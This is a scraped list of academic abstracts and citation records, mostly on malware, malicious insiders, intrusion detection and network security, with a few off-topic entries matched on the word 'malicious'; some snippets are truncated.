Critical Infrastructures are nowadays exposed to new kind of threats. The cause of such threats is related to the large number of new vulnerabilities and architectural weaknesses introduced by the extensive use of ICT and Network technologies into such complex critical systems. Of particular interest are the set of vulnerabilities related to the class of communication protocols normally known as “SCADA” protocols, under which fall all the communication protocols used to remotely control the RTU devices of an industrial system. In this paper we present a proof of concept of the potential effects of a set of computer malware specifically designed and created in order to impact, by taking advantage of some vulnerabilities of the ModBUS protocol, on a typical Supervisory Control and Data Acquisition system.

Incentives, Behavior, and Risk Management

ERIC Educational Resources Information Center

Liu, Debin

2011-01-01

Insiders are one of the most serious threats to an organization's information assets. Generally speaking, there are two types of insider threats based on the insiders' intents. Malicious Insiders are individuals with varying degrees of harmful intentions. Inadvertent Insiders are individuals without malicious intent. In this dissertation, I…

Integrating Multiple Data Views for Improved Malware Analysis

DOE Office of Scientific and Technical Information (OSTI.GOV)

Anderson, Blake H.

2014-01-31

Exploiting multiple views of a program makes obfuscating the intended behavior of a program more difficult allowing for better performance in classification, clustering, and phylogenetic reconstruction.

Security and privacy qualities of medical devices: an analysis of FDA postmarket surveillance.

PubMed

Kramer, Daniel B; Baker, Matthew; Ransford, Benjamin; Molina-Markham, Andres; Stewart, Quinn; Fu, Kevin; Reynolds, Matthew R

2012-01-01

Medical devices increasingly depend on computing functions such as wireless communication and Internet connectivity for software-based control of therapies and network-based transmission of patients' stored medical information. These computing capabilities introduce security and privacy risks, yet little is known about the prevalence of such risks within the clinical setting. We used three comprehensive, publicly available databases maintained by the Food and Drug Administration (FDA) to evaluate recalls and adverse events related to security and privacy risks of medical devices. Review of weekly enforcement reports identified 1,845 recalls; 605 (32.8%) of these included computers, 35 (1.9%) stored patient data, and 31 (1.7%) were capable of wireless communication. Searches of databases specific to recalls and adverse events identified only one event with a specific connection to security or privacy. Software-related recalls were relatively common, and most (81.8%) mentioned the possibility of upgrades, though only half of these provided specific instructions for the update mechanism. Our review of recalls and adverse events from federal government databases reveals sharp inconsistencies with databases at individual providers with respect to security and privacy risks. Recalls related to software may increase security risks because of unprotected update and correction mechanisms. To detect signals of security and privacy problems that adversely affect public health, federal postmarket surveillance strategies should rethink how to effectively and efficiently collect data on security and privacy problems in devices that increasingly depend on computing systems susceptible to malware.

Security and Privacy Qualities of Medical Devices: An Analysis of FDA Postmarket Surveillance

PubMed Central

Kramer, Daniel B.; Baker, Matthew; Ransford, Benjamin; Molina-Markham, Andres; Stewart, Quinn; Fu, Kevin; Reynolds, Matthew R.

2012-01-01

Background Medical devices increasingly depend on computing functions such as wireless communication and Internet connectivity for software-based control of therapies and network-based transmission of patients’ stored medical information. These computing capabilities introduce security and privacy risks, yet little is known about the prevalence of such risks within the clinical setting. Methods We used three comprehensive, publicly available databases maintained by the Food and Drug Administration (FDA) to evaluate recalls and adverse events related to security and privacy risks of medical devices. Results Review of weekly enforcement reports identified 1,845 recalls; 605 (32.8%) of these included computers, 35 (1.9%) stored patient data, and 31 (1.7%) were capable of wireless communication. Searches of databases specific to recalls and adverse events identified only one event with a specific connection to security or privacy. Software-related recalls were relatively common, and most (81.8%) mentioned the possibility of upgrades, though only half of these provided specific instructions for the update mechanism. Conclusions Our review of recalls and adverse events from federal government databases reveals sharp inconsistencies with databases at individual providers with respect to security and privacy risks. Recalls related to software may increase security risks because of unprotected update and correction mechanisms. To detect signals of security and privacy problems that adversely affect public health, federal postmarket surveillance strategies should rethink how to effectively and efficiently collect data on security and privacy problems in devices that increasingly depend on computing systems susceptible to malware. PMID:22829874

Malicious Use of Nonpharmaceuticals in Children

ERIC Educational Resources Information Center

Yin, Shan

2011-01-01

Objective: The objective of this study was to describe malicious nonpharmaceutical exposures in children reported to US poison centers. Methods: We performed a retrospective study of all nonpharmaceutical exposures involving children 7 years old reported to the US National Poison Data System (NPDS) from 2000 to 2008 for which the reason for…

Study of the stability of a SEIRS model for computer worm propagation

NASA Astrophysics Data System (ADS)

Hernández Guillén, J. D.; Martín del Rey, A.; Hernández Encinas, L.

2017-08-01

Nowadays, malware is the most important threat to information security. In this sense, several mathematical models to simulate malware spreading have appeared. They are compartmental models where the population of devices is classified into different compartments: susceptible, exposed, infectious, recovered, etc. The main goal of this work is to propose an improved SEIRS (Susceptible-Exposed-Infectious-Recovered-Susceptible) mathematical model to simulate computer worm propagation. It is a continuous model whose dynamic is ruled by means of a system of ordinary differential equations. It considers more realistic parameters related to the propagation; in fact, a modified incidence rate has been used. Moreover, the equilibrium points are computed and their local and global stability analyses are studied. From the explicit expression of the basic reproductive number, efficient control measures are also obtained.

VeryVote: A Voter Verifiable Code Voting System

NASA Astrophysics Data System (ADS)

Joaquim, Rui; Ribeiro, Carlos; Ferreira, Paulo

Code voting is a technique used to address the secure platform problem of remote voting. A code voting system consists in secretly sending, e.g. by mail, code sheets to voters that map their choices to entry codes in their ballot. While voting, the voter uses the code sheet to know what code to enter in order to vote for a particular candidate. In effect, the voter does the vote encryption and, since no malicious software on the PC has access to the code sheet it is not able to change the voter’s intention. However, without compromising the voter’s privacy, the vote codes are not enough to prove that the vote is recorded and counted as cast by the election server.

Detecting Targeted Malicious Email through Supervised Classification of Persistent Threat and Recipient Oriented Features

ERIC Educational Resources Information Center

Amin, Rohan Mahesh

2010-01-01

Targeted email attacks to enable computer network exploitation have become more prevalent, more insidious, and more widely documented in recent years. Beyond nuisance spam or phishing designed to trick users into revealing personal information, targeted malicious email (TME) facilitates computer network exploitation and the gathering of sensitive…

Concurrent and Short-Term Longitudinal Associations between Peer Victimization and School and Recess Liking during Middle Childhood

ERIC Educational Resources Information Center

Boulton, Michael J.; Chau, Cam; Whitehand, Caroline; Amataya, Kishori; Murray, Lindsay

2009-01-01

Background: Prior studies outside of the UK have shown that peer victimization is negatively associated with school adjustment. Aims: To examine concurrent and short-term longitudinal associations between peer victimization (physical, malicious teasing, deliberate social exclusion, and malicious gossiping) and two measures of school adjustment…

Whatever Happened to Formal Methods for Security?

PubMed Central

Voas, J.; Schaffer, K.

2016-01-01

We asked 7 experts 7 questions to find out what has occurred recently in terms of applying formal methods (FM) to security-centric, cyber problems. We are continually reminded of the 1996 paper by Tony Hoare “How did Software Get So Reliable Without Proof?” [1] In that vein, how did we get so insecure with proof? Given daily press announcements concerning new malware, data breaches, and privacy loss, is FM still relevant or was it ever? Our experts answered with unique personal insights. We were curious as to whether this successful methodology in “safety-critical” has succeeded as well for today’s “build it, hack it, patch it” mindset. Our experts were John McLean (Naval Research Labs), Paul Black (National Institute of Standards and Technology), Karl Levitt (University of California at Davis), Joseph Williams (CloudEconomist.Com), Connie Heitmeyer (Naval Research Labs), Eugene Spafford (Purdue University), and Joseph Kiniry (Galois, Inc.). The questions and responses follow. PMID:27890940

Preventing and Profiling Malicious Insider Attacks

DTIC Science & Technology

2012-04-01

malicious insiders. This research program could also be extended to look at general human factors issues surrounding information security behaviours ... behaviours . This research also draws on corresponding studies into fraud and espionage in non IT scenarios. A range of preventative measures is...This includes motivating factors, personality traits and observable behaviours that may assist organisations in the detection and profiling of

Crowdsourcing contest dilemma

PubMed Central

Naroditskiy, Victor; Jennings, Nicholas R.; Van Hentenryck, Pascal; Cebrian, Manuel

2014-01-01

Crowdsourcing offers unprecedented potential for solving tasks efficiently by tapping into the skills of large groups of people. A salient feature of crowdsourcing—its openness of entry—makes it vulnerable to malicious behaviour. Such behaviour took place in a number of recent popular crowdsourcing competitions. We provide game-theoretic analysis of a fundamental trade-off between the potential for increased productivity and the possibility of being set back by malicious behaviour. Our results show that in crowdsourcing competitions malicious behaviour is the norm, not the anomaly—a result contrary to the conventional wisdom in the area. Counterintuitively, making the attacks more costly does not deter them but leads to a less desirable outcome. These findings have cautionary implications for the design of crowdsourcing competitions. PMID:25142518

Deterring Malicious Behavior in Cyberspace

DTIC Science & Technology

2015-01-01

Malicious Behavior in Cyberspace Strategic Studies Quarterly ♦ Spring 2015 [ 79 ] 8. Chris Pepper, ed., Defending against Denial of Service Attacks...Jackson Higgins , “Chinese Cyberespionage Tool Updated for Traditional Cyber- crime,” Dark Reading, 27 November 2012, http://www.darkreading.com/attacks...content /uploads/sites/43/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf. 13. Kelly Jackson Higgins , “ ‘NetTraveler’ Cyberespionage Campaign

Data threats analysis and prevention on iOS platform

NASA Astrophysics Data System (ADS)

Gao, Bo; Wang, Yi; Chen, Zhou; Tang, Jiqiang

2015-12-01

Background: The rapid growth of mobile internet has driven the rapid popularity of smart mobiles. iOS device is chosen by more and more people for its humanity, stability and excellent industrial design, and the data security problem that followed it has gradually attracted the researchers' attention. Method & Result: This thesis focuses on the analysis of current situation of data security on iOS platform, from both security mechanism and data risk, and proposes countermeasures. Conclusion: From practical work, many problems of data security mechanism on iOS platform still exist. At present, the problem of malicious software towards iOS system has not been severe, but how to ensure the security of data on iOS platform will inevitably become one of the directions for our further study.

Countermeasures for Time-Cheat Detection in Multiplayer Online Games

NASA Astrophysics Data System (ADS)

Ferretti, Stefano

Cheating is an important issue in games. Depending on the system over which the game is deployed, several types of malicious actions may be accomplished so as to take an unfair and unexpected advantage over the game and over the (digital, human) adversaries. When the game is a standalone application, cheats typically just relate to the specific software code being developed to build the application. It is not a surprise to find (in the Web and in specialized magazines) people that explain cheats on specific games stating, for instance, which configuration files can be altered (and how to do it) to automatically gain some bonus during the game. To avoid this, game developers are hence motivated to build stable code, with related data that should be securely managed and made difficult to alter.

A Novel Malware Target Recognition Architecture for Enhanced Cyberspace Situation Awareness

DTIC Science & Technology

2011-09-01

71 3.1 Chapter Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 3.2 CRISP - DM Process...71 3.3 Execution of the CRISP - DM Process...64 10. Adaptation of CRISP - DM process (from [13]). . . . . . . . . . . . . . . . . . . . . . . 72 11. Comparison of detection

Job Analysis Results for Malicious-Code Reverse Engineers: A Case Study

DTIC Science & Technology

2014-05-01

Testing in Personnel Selection: Contemporary Issues in Cognitive Ability and Personality Testing .” Journal of Business Inquiry: Research , Edu- cation, and...federally funded research and development center. Any opinions, findings and conclusions or recommendations expressed in this material are those of...predict the develop- ment of expertise is important. Currently, job analysis research on teams of malicious-code re- verse engineers is lacking. Therefore

T2AR: trust-aware ad-hoc routing protocol for MANET.

PubMed

Dhananjayan, Gayathri; Subbiah, Janakiraman

2016-01-01

Secure data transfer against the malicious attacks is an important issue in an infrastructure-less independent network called mobile ad-hoc network (MANET). Trust assurance between MANET nodes is the key parameter in the high-security provision under dynamic topology variations and open wireless constraints. But, the malicious behavior of nodes reduces the trust level of the nodes that leads to an insecure data delivery. The increase in malicious attacks causes the excessive energy consumption that leads to a reduction of network lifetime. The lack of positional information update of the nodes in ad-hoc on-demand vector (AODV) protocol during the connection establishment offers less trust level between the nodes. Hence, the trust rate computation using energy and mobility models and its update are the essential tasks for secure data delivery. This paper proposes a trust-aware ad-hoc routing (T2AR) protocol to improve the trust level between the nodes in MANET. The proposed method modifies the traditional AODV routing protocol with the constraints of trust rate, energy, mobility based malicious behavior prediction. The packet sequence ID matching from the log reports of neighbor nodes determine the trust rate that avoids the malicious report generation. Besides, the direct and indirect trust observation schemes utilization increases the trust level. Besides, the received signal strength indicator utilization determines the trusted node is within the communication range or not. The comparative analysis between the proposed T2AR with the existing methods such as TRUNCMAN, RBT, GR, FBR and DICOTIDS regarding the average end-to-end delay, throughput, false positives, packet delivery ratio shows the effectiveness of T2AR in the secure MANET environment design.

Game Theory Meets Wireless Sensor Networks Security Requirements and Threats Mitigation: A Survey.

PubMed

Abdalzaher, Mohamed S; Seddik, Karim; Elsabrouty, Maha; Muta, Osamu; Furukawa, Hiroshi; Abdel-Rahman, Adel

2016-06-29

We present a study of using game theory for protecting wireless sensor networks (WSNs) from selfish behavior or malicious nodes. Due to scalability, low complexity and disseminated nature of WSNs, malicious attacks can be modeled effectively using game theory. In this study, we survey the different game-theoretic defense strategies for WSNs. We present a taxonomy of the game theory approaches based on the nature of the attack, whether it is caused by an external attacker or it is the result of an internal node acting selfishly or maliciously. We also present a general trust model using game theory for decision making. We, finally, identify the significant role of evolutionary games for WSNs security against intelligent attacks; then, we list several prospect applications of game theory to enhance the data trustworthiness and node cooperation in different WSNs.

New Technologies and Emerging Threats: Personnel Security Adjudicative Guidelines in the Age of Social Networking

DTIC Science & Technology

2012-12-01

behavior unless it becomes criminal or involves the publishing of sensitive information. This means that malicious doxing, cyberbullying or other...workplace or background investigation realms, as well as the many forms of cyberbullying and malicious rumor-spreading online could be addressed. Doxing...None Sexually harass another person online None Engage in cyberbullying by using the Internet to send offensive, inappropriate verbal allack

Insider Threat Detection on the Windows Operating System using Virtual Machine Introspection

DTIC Science & Technology

2012-06-14

by a malicious insider. HBSS systems running on a user’s workstation could be disabled either due to misconfiguration, privilege escalation , or by a...potential malicious insider threat, organizations must develop use cases which categorize possible attack techniques, such as data exfiltration via...hardware and contain any type of data an attacker may be looking for. Minimal Resources Since honeypots do not provide any network services, they

Detecting Malicious Tweets in Twitter Using Runtime Monitoring With Hidden Information

DTIC Science & Technology

2016-06-01

text mining using Twitter streaming API and python [Online]. Available: http://adilmoujahid.com/posts/2014/07/twitter-analytics/ [22] M. Singh, B...sites with 645,750,000 registered users [3] and has open source public tweets for data mining . 2. Malicious Users and Tweets In the modern world...want to data mine in Twitter, and presents the natural language assertions and corresponding rule patterns. It then describes the steps performed using

Using Trust to Establish a Secure Routing Model in Cognitive Radio Network.

PubMed

Zhang, Guanghua; Chen, Zhenguo; Tian, Liqin; Zhang, Dongwen

2015-01-01

Specific to the selective forwarding attack on routing in cognitive radio network, this paper proposes a trust-based secure routing model. Through monitoring nodes' forwarding behaviors, trusts of nodes are constructed to identify malicious nodes. In consideration of that routing selection-based model must be closely collaborative with spectrum allocation, a route request piggybacking available spectrum opportunities is sent to non-malicious nodes. In the routing decision phase, nodes' trusts are used to construct available path trusts and delay measurement is combined for making routing decisions. At the same time, according to the trust classification, different responses are made specific to their service requests. By adopting stricter punishment on malicious behaviors from non-trusted nodes, the cooperation of nodes in routing can be stimulated. Simulation results and analysis indicate that this model has good performance in network throughput and end-to-end delay under the selective forwarding attack.

Game Theory Meets Wireless Sensor Networks Security Requirements and Threats Mitigation: A Survey

PubMed Central

Abdalzaher, Mohamed S.; Seddik, Karim; Elsabrouty, Maha; Muta, Osamu; Furukawa, Hiroshi; Abdel-Rahman, Adel

2016-01-01

We present a study of using game theory for protecting wireless sensor networks (WSNs) from selfish behavior or malicious nodes. Due to scalability, low complexity and disseminated nature of WSNs, malicious attacks can be modeled effectively using game theory. In this study, we survey the different game-theoretic defense strategies for WSNs. We present a taxonomy of the game theory approaches based on the nature of the attack, whether it is caused by an external attacker or it is the result of an internal node acting selfishly or maliciously. We also present a general trust model using game theory for decision making. We, finally, identify the significant role of evolutionary games for WSNs security against intelligent attacks; then, we list several prospect applications of game theory to enhance the data trustworthiness and node cooperation in different WSNs. PMID:27367700

A Mechanism to Avoid Collusion Attacks Based on Code Passing in Mobile Agent Systems

NASA Astrophysics Data System (ADS)

Jaimez, Marc; Esparza, Oscar; Muñoz, Jose L.; Alins-Delgado, Juan J.; Mata-Díaz, Jorge

Mobile agents are software entities consisting of code, data, state and itinerary that can migrate autonomously from host to host executing their code. Despite its benefits, security issues strongly restrict the use of code mobility. The protection of mobile agents against the attacks of malicious hosts is considered the most difficult security problem to solve in mobile agent systems. In particular, collusion attacks have been barely studied in the literature. This paper presents a mechanism that avoids collusion attacks based on code passing. Our proposal is based on a Multi-Code agent, which contains a different variant of the code for each host. A Trusted Third Party is responsible for providing the information to extract its own variant to the hosts, and for taking trusted timestamps that will be used to verify time coherence.

Network Security Validation Using Game Theory

NASA Astrophysics Data System (ADS)

Papadopoulou, Vicky; Gregoriades, Andreas

Non-functional requirements (NFR) such as network security recently gained widespread attention in distributed information systems. Despite their importance however, there is no systematic approach to validate these requirements given the complexity and uncertainty characterizing modern networks. Traditionally, network security requirements specification has been the results of a reactive process. This however, limited the immunity property of the distributed systems that depended on these networks. Security requirements specification need a proactive approach. Networks' infrastructure is constantly under attack by hackers and malicious software that aim to break into computers. To combat these threats, network designers need sophisticated security validation techniques that will guarantee the minimum level of security for their future networks. This paper presents a game-theoretic approach to security requirements validation. An introduction to game theory is presented along with an example that demonstrates the application of the approach.

Cyber War: The Next Frontier for NATO

DTIC Science & Technology

2015-03-01

cyber-attacks as a way to advance their agenda. Common examples of cyber- attacks include computer viruses, worms , malware, and distributed denial of...take advantage of security holes and cause damage to computer systems, steal financial data, or acquire sensitive secrets. As technology becomes

Sensor Based Framework for Secure Multimedia Communication in VANET

PubMed Central

Rahim, Aneel; Khan, Zeeshan Shafi; Bin Muhaya, Fahad T.; Sher, Muhammad; Kim, Tai-Hoon

2010-01-01

Secure multimedia communication enhances the safety of passengers by providing visual pictures of accidents and danger situations. In this paper we proposed a framework for secure multimedia communication in Vehicular Ad-Hoc Networks (VANETs). Our proposed framework is mainly divided into four components: redundant information, priority assignment, malicious data verification and malicious node verification. The proposed scheme jhas been validated with the help of the NS-2 network simulator and the Evalvid tool. PMID:22163462

Health care, an easy target, needs to get its guard up.

PubMed

Ladika, Susan

2016-12-01

Health care ranked ninth in terms of its cybersecurity in a recent report by SecurityScorecard, a company that provides risk monitoring and security ratings. The health care industry is widely infected with malware and has come under repeated ransomware attacks.

Stop Sleazeware

ERIC Educational Resources Information Center

Reynolds, Ben

2005-01-01

"Sleazeware" is the authors' term for spyware, adware, malware, trackware, foistware, trojans, and other programs that sleaze into computers, either as a hidden component or by tricking someone into downloading them. Once in the machine, the program phones home for purposes ranging from simply reporting where people browse to downloading…

Hardware Support for Malware Defense and End-to-End Trust

DTIC Science & Technology

2017-02-01

IoT) sensors and actuators, mobile devices and servers; cloud based, stand alone, and traditional mainframes. The prototype developed demonstrated...virtual machines. For mobile platforms we developed and prototyped an architecture supporting separation of personalities on the same platform...4 3.1. MOBILE

Automatic Identification of Critical Data Items in a Database to Mitigate the Effects of Malicious Insiders

NASA Astrophysics Data System (ADS)

White, Jonathan; Panda, Brajendra

A major concern for computer system security is the threat from malicious insiders who target and abuse critical data items in the system. In this paper, we propose a solution to enable automatic identification of critical data items in a database by way of data dependency relationships. This identification of critical data items is necessary because insider threats often target mission critical data in order to accomplish malicious tasks. Unfortunately, currently available systems fail to address this problem in a comprehensive manner. It is more difficult for non-experts to identify these critical data items because of their lack of familiarity and due to the fact that data systems are constantly changing. By identifying the critical data items automatically, security engineers will be better prepared to protect what is critical to the mission of the organization and also have the ability to focus their security efforts on these critical data items. We have developed an algorithm that scans the database logs and forms a directed graph showing which items influence a large number of other items and at what frequency this influence occurs. This graph is traversed to reveal the data items which have a large influence throughout the database system by using a novel metric based formula. These items are critical to the system because if they are maliciously altered or stolen, the malicious alterations will spread throughout the system, delaying recovery and causing a much more malignant effect. As these items have significant influence, they are deemed to be critical and worthy of extra security measures. Our proposal is not intended to replace existing intrusion detection systems, but rather is intended to complement current and future technologies. Our proposal has never been performed before, and our experimental results have shown that it is very effective in revealing critical data items automatically.

Test and Evaluation of the Malicious Activity Simulation Tool (MAST) in a Local Area Network (LAN) Running the Common PC Operating System Environment (COMPOSE)

DTIC Science & Technology

2013-09-01

Malicious Activity Simulation Tool MMORPG Massively Multiplayer Online Role-Playing Game MMS Mission Management Server MOA Memorandum of Agreement MS...conferencing, and massively multiplayer online role- playing games (MMORPG). During all of these Internet-based exchanges and transactions, the Internet user...In its 2011 Internet Crime Report, the Internet Crime Complaint Center (IC3) stated there were more than 300,000 complaints of online criminal

A prototype forensic toolkit for industrial-control-systems incident response

NASA Astrophysics Data System (ADS)

Carr, Nickolas B.; Rowe, Neil C.

2015-05-01

Industrial control systems (ICSs) are an important part of critical infrastructure in cyberspace. They are especially vulnerable to cyber-attacks because of their legacy hardware and software and the difficulty of changing it. We first survey the history of intrusions into ICSs, the more serious of which involved a continuing adversary presence on an ICS network. We discuss some common vulnerabilities and the categories of possible attacks, noting the frequent use of software written a long time ago. We propose a framework for designing ICS incident response under the constraints that no new software must be required and that interventions cannot impede the continuous processing that is the norm for such systems. We then discuss a prototype toolkit we built using the Windows Management Instrumentation Command-Line tool for host-based analysis and the Bro intrusion-detection software for network-based analysis. Particularly useful techniques we used were learning the historical range of parameters of numeric quantities so as to recognize anomalies, learning the usual addresses of connections to a node, observing Internet addresses (usually rare), observing anomalous network protocols such as unencrypted data transfers, observing unusual scheduled tasks, and comparing key files through registry entries and hash values to find malicious modifications. We tested our methods on actual data from ICSs including publicly-available data, voluntarily-submitted data, and researcher-provided "advanced persistent threat" data. We found instances of interesting behavior in our experiments. Intrusions were generally easy to see because of the repetitive nature of most processing on ICSs, but operators need to be motivated to look.

Analytical Characterization of Internet Security Attacks

ERIC Educational Resources Information Center

Sellke, Sarah H.

2010-01-01

Internet security attacks have drawn significant attention due to their enormously adverse impact. These attacks includes Malware (Viruses, Worms, Trojan Horse), Denial of Service, Packet Sniffer, and Password Attacks. There is an increasing need to provide adequate defense mechanisms against these attacks. My thesis proposal deals with analytical…

Radio Frequency Based Programmable Logic Controller Anomaly Detection

DTIC Science & Technology

2013-09-01

include wireless radios, IEEE 802.15 Blue- tooth devices, cellular phones, and IEEE 802.11 WiFi networking devices. While wireless communication...MacKenzie, H. Shamoon Malware and SCADA Security What are the Im- pacts? . Technical Report, Tofino Security, Sep 2012. 61. Mateti,P. Hacking Techniques

Spear Phishing Attack Detection

DTIC Science & Technology

2011-03-24

the insider amongst senior leaders of an organization [Mes08], the undercover detective within a drug cartel, or the classic secret agent planted in...to a mimicry attack that shapes the embedded malware to have a statistical distribution similar to "normal" or benign behavior. 2.3.1.3

A two-stage flow-based intrusion detection model for next-generation networks.

PubMed

Umer, Muhammad Fahad; Sher, Muhammad; Bi, Yaxin

2018-01-01

The next-generation network provides state-of-the-art access-independent services over converged mobile and fixed networks. Security in the converged network environment is a major challenge. Traditional packet and protocol-based intrusion detection techniques cannot be used in next-generation networks due to slow throughput, low accuracy and their inability to inspect encrypted payload. An alternative solution for protection of next-generation networks is to use network flow records for detection of malicious activity in the network traffic. The network flow records are independent of access networks and user applications. In this paper, we propose a two-stage flow-based intrusion detection system for next-generation networks. The first stage uses an enhanced unsupervised one-class support vector machine which separates malicious flows from normal network traffic. The second stage uses a self-organizing map which automatically groups malicious flows into different alert clusters. We validated the proposed approach on two flow-based datasets and obtained promising results.

A two-stage flow-based intrusion detection model for next-generation networks

PubMed Central

2018-01-01

The next-generation network provides state-of-the-art access-independent services over converged mobile and fixed networks. Security in the converged network environment is a major challenge. Traditional packet and protocol-based intrusion detection techniques cannot be used in next-generation networks due to slow throughput, low accuracy and their inability to inspect encrypted payload. An alternative solution for protection of next-generation networks is to use network flow records for detection of malicious activity in the network traffic. The network flow records are independent of access networks and user applications. In this paper, we propose a two-stage flow-based intrusion detection system for next-generation networks. The first stage uses an enhanced unsupervised one-class support vector machine which separates malicious flows from normal network traffic. The second stage uses a self-organizing map which automatically groups malicious flows into different alert clusters. We validated the proposed approach on two flow-based datasets and obtained promising results. PMID:29329294

A Learning System for Discriminating Variants of Malicious Network Traffic

DOE Office of Scientific and Technical Information (OSTI.GOV)

Beaver, Justin M; Symons, Christopher T; Gillen, Rob

Modern computer network defense systems rely primarily on signature-based intrusion detection tools, which generate alerts when patterns that are pre-determined to be malicious are encountered in network data streams. Signatures are created reactively, and only after in-depth manual analysis of a network intrusion. There is little ability for signature-based detectors to identify intrusions that are new or even variants of an existing attack, and little ability to adapt the detectors to the patterns unique to a network environment. Due to these limitations, the need exists for network intrusion detection techniques that can more comprehensively address both known unknown networkbased attacksmore » and can be optimized for the target environment. This work describes a system that leverages machine learning to provide a network intrusion detection capability that analyzes behaviors in channels of communication between individual computers. Using examples of malicious and non-malicious traffic in the target environment, the system can be trained to discriminate between traffic types. The machine learning provides insight that would be difficult for a human to explicitly code as a signature because it evaluates many interdependent metrics simultaneously. With this approach, zero day detection is possible by focusing on similarity to known traffic types rather than mining for specific bit patterns or conditions. This also reduces the burden on organizations to account for all possible attack variant combinations through signatures. The approach is presented along with results from a third-party evaluation of its performance.« less

Securing Collaborative Spectrum Sensing against Untrustworthy Secondary Users in Cognitive Radio Networks

NASA Astrophysics Data System (ADS)

Wang, Wenkai; Li, Husheng; Sun, Yan(Lindsay); Han, Zhu

2009-12-01

Cognitive radio is a revolutionary paradigm to migrate the spectrum scarcity problem in wireless networks. In cognitive radio networks, collaborative spectrum sensing is considered as an effective method to improve the performance of primary user detection. For current collaborative spectrum sensing schemes, secondary users are usually assumed to report their sensing information honestly. However, compromised nodes can send false sensing information to mislead the system. In this paper, we study the detection of untrustworthy secondary users in cognitive radio networks. We first analyze the case when there is only one compromised node in collaborative spectrum sensing schemes. Then we investigate the scenario that there are multiple compromised nodes. Defense schemes are proposed to detect malicious nodes according to their reporting histories. We calculate the suspicious level of all nodes based on their reports. The reports from nodes with high suspicious levels will be excluded in decision-making. Compared with existing defense methods, the proposed scheme can effectively differentiate malicious nodes and honest nodes. As a result, it can significantly improve the performance of collaborative sensing. For example, when there are 10 secondary users, with the primary user detection rate being equal to 0.99, one malicious user can make the false alarm rate [InlineEquation not available: see fulltext.] increase to 72%. The proposed scheme can reduce it to 5%. Two malicious users can make [InlineEquation not available: see fulltext.] increase to 85% and the proposed scheme reduces it to 8%.

SCADA Protocol Anomaly Detection Utilizing Compression (SPADUC) 2013

DOE Office of Scientific and Technical Information (OSTI.GOV)

Gordon Rueff; Lyle Roybal; Denis Vollmer

2013-01-01

There is a significant need to protect the nation’s energy infrastructures from malicious actors using cyber methods. Supervisory, Control, and Data Acquisition (SCADA) systems may be vulnerable due to the insufficient security implemented during the design and deployment of these control systems. This is particularly true in older legacy SCADA systems that are still commonly in use. The purpose of INL’s research on the SCADA Protocol Anomaly Detection Utilizing Compression (SPADUC) project was to determine if and how data compression techniques could be used to identify and protect SCADA systems from cyber attacks. Initially, the concept was centered on howmore » to train a compression algorithm to recognize normal control system traffic versus hostile network traffic. Because large portions of the TCP/IP message traffic (called packets) are repetitive, the concept of using compression techniques to differentiate “non-normal” traffic was proposed. In this manner, malicious SCADA traffic could be identified at the packet level prior to completing its payload. Previous research has shown that SCADA network traffic has traits desirable for compression analysis. This work investigated three different approaches to identify malicious SCADA network traffic using compression techniques. The preliminary analyses and results presented herein are clearly able to differentiate normal from malicious network traffic at the packet level at a very high confidence level for the conditions tested. Additionally, the master dictionary approach used in this research appears to initially provide a meaningful way to categorize and compare packets within a communication channel.« less

Realization and optimization of AES algorithm on the TMS320DM6446 based on DaVinci technology

NASA Astrophysics Data System (ADS)

Jia, Wen-bin; Xiao, Fu-hai

2013-03-01

The application of AES algorithm in the digital cinema system avoids video data to be illegal theft or malicious tampering, and solves its security problems. At the same time, in order to meet the requirements of the real-time, scene and transparent encryption of high-speed data streams of audio and video in the information security field, through the in-depth analysis of AES algorithm principle, based on the hardware platform of TMS320DM6446, with the software framework structure of DaVinci, this paper proposes the specific realization methods of AES algorithm in digital video system and its optimization solutions. The test results show digital movies encrypted by AES128 can not play normally, which ensures the security of digital movies. Through the comparison of the performance of AES128 algorithm before optimization and after, the correctness and validity of improved algorithm is verified.

Battlefield of the Future: How to Achieve Superiority in the Cyberspace Domain

DTIC Science & Technology

2016-02-01

the information. Spamming is sending unsolicited email advertising for services, products and websites used as a delivery mechanism for malware and...other cyber threats. Spoofing is generating a fake website to impersonate a real website run by a different party. Email spoofing 11 is altering

Developing a Qualia-Based Multi-Agent Architecture for Use in Malware Detection

DTIC Science & Technology

2010-03-01

executables were correctly classified with a 6% false positive rate [7]. Kolter and Maloof expand Schultz’s work by analyzing different...Proceedings of the 2001 IEEE Symposium on Security and Privacy. Los Alamitos, CA: IEEE Computer Society, 2001. [8] J. Z. Kolter and M. A. Maloof

The ZeroAccess Auto-Clicking and Search-Hijacking Click Fraud Modules

DTIC Science & Technology

2013-12-16

payloads and instead began distributing Bitcoin miners and click fraud modules.3 From a technical perspective, the primary click fraud malware used in...this era operated in the indiscriminate “auto-clicking” fashion we describe in Section 5. Alongside the click fraud and Bitcoin payloads, ZeroAccess

The (Campus) Empire Strikes Back

ERIC Educational Resources Information Center

Archibald, Fred

2008-01-01

When it comes to anti-malware protection, today's university IT departments have their work cut out for them. Network managers must walk the fine line between enabling a highly collaborative, non-restrictive environment, and ensuring the confidentiality, integrity, and availability of data and computing resources. This is no easy task, especially…

An Assessment of the Department of Defense Strategy for Operating in Cyberspace

DTIC Science & Technology

2013-09-01

were responsible for developing the Stuxnet malware aimed at sabotaging the Natanz uranium enrichment plant in Iran.66 Stuxnet spread through the...and De- tection for the Twenty-First Century, Upper Saddle River, NJ: Ad- dison Wesley, 2009. 36. Ronald Krutz and Russell Vines, Cloud Security: a

Mining and Indexing Graph Databases

ERIC Educational Resources Information Center

Yuan, Dayu

2013-01-01

Graphs are widely used to model structures and relationships of objects in various scientific and commercial fields. Chemical molecules, proteins, malware system-call dependencies and three-dimensional mechanical parts are all modeled as graphs. In this dissertation, we propose to mine and index those graph data to enable fast and scalable search.…

Using OpenSSH to secure mobile LAN network traffic

NASA Astrophysics Data System (ADS)

Luu, Brian B.; Gopaul, Richard D.

2002-08-01

